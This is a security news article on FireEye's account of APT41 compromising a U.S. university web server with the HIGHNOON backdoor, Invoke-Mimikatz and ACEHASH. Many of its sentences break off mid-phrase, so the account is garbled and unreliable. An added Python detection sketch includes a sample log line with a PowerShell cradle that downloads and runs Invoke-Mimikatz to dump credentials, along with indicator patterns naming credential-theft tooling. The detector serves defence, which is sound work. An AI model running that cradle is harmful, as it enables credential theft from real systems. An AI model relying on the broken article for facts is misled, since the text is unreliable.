Experts at FireEye observed the China-linked APT41 group targeting a web server at a U.S.-based research university.
APT41 has been active since at least 2012 and has been involved in both state-sponsored espionage campaigns and financially motivated attacks since 2014. The group has hit entities in several industries, including gaming, healthcare, high-tech, higher education, telecommunications, and travel services.
Unlike other China-based actors, the group uses custom malware in its cyber espionage operations; experts have observed 46 different malware families and tools in APT41 campaigns.
“APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain,” states the report published by FireEye. “Explicit financially-motivated targeting is unusual among Chinese state-sponsored threat groups, and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward.”
APT41 leverages several techniques to carry out the initial compromise, including
Experts observed APT41 using spear-phishing email with attachments such as compiled HTML (
The arsenal of the group includes
The attack against a publicly-accessible web server at a U
The attack involved two additional files, the HIGHNOON backdoor and a
“HIGHNOON is a backdoor that consists of multiple components, including a loader, dynamic-link library (DLL), and a
Attackers used the HIGHNOON backdoor to execute a PowerShell command and download a script from PowerSploit. This script appears to be a copy of Invoke-Mimikatz
The hackers also conducted additional reconnaissance and downloaded two additional files, representing the dropper and encrypted/compressed payload components of the ACEHASH malware. The ACEHASH malware is a credential stealer and password dumping utility.
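The HIGHNOON-to-PowerShell step above (a download cradle pulling Invoke-Mimikatz from PowerSploit) leaves a recognizable trace in PowerShell script block logging. The following detection sketch is an added example for defenders, not code from FireEye or from the report; the log entries and the `example.invalid` URL are constructed, and the indicator lists and severity tiers are assumptions you would tune to your environment.

```python
import re
from dataclasses import dataclass

# Constructed sample script block log entries (Event ID 4104 style), not logs
# from the incident. Event 1 mimics the article's download-and-run of
# Invoke-Mimikatz; events 2 and 3 are benign administrative activity.
SAMPLE_EVENTS = [
    {"id": 1, "host": "webserver01",
     "script": "IEX (New-Object Net.WebClient).DownloadString("
               "'http://example.invalid/PowerSploit/Invoke-Mimikatz.ps1'); "
               "Invoke-Mimikatz -DumpCreds"},
    {"id": 2, "host": "webserver01",
     "script": "Get-Service | Where-Object {$_.Status -eq 'Running'}"},
    {"id": 3, "host": "admin01",
     "script": "Invoke-WebRequest -Uri 'https://example.invalid/update.msi' "
               "-OutFile C:\\temp\\update.msi"},
]

# Indicators grouped by meaning so that a hit explains itself in the alert.
# Assumed patterns: extend with your own known-bad tooling names.
INDICATORS = {
    "download_cradle": re.compile(
        r"(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\s)", re.I),
    "in_memory_exec": re.compile(r"(\bIEX\b|Invoke-Expression)", re.I),
    "cred_dump_tooling": re.compile(
        r"(Invoke-Mimikatz|PowerSploit|sekurlsa|DumpCreds)", re.I),
}

@dataclass
class Finding:
    event_id: int
    host: str
    matched: list
    severity: str

def score(matched):
    # Any credential-dumping tooling is high; a cradle feeding in-memory
    # execution without it is medium; a bare download is low (often benign).
    if "cred_dump_tooling" in matched:
        return "high"
    if "download_cradle" in matched and "in_memory_exec" in matched:
        return "medium"
    return "low"

def scan_events(events):
    """Return one Finding per event that matches at least one indicator group."""
    findings = []
    for ev in events:
        matched = [name for name, rx in INDICATORS.items() if rx.search(ev["script"])]
        if matched:
            findings.append(Finding(ev["id"], ev["host"], matched, score(matched)))
    return findings
```

On a web server that has no business running PowerShell download cradles at all, the host field is as important as the script content: a "low" hit on `webserver01` deserves a look that the same hit on an admin workstation may not.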
In summary, the hackers were able to exploit the vulnerability in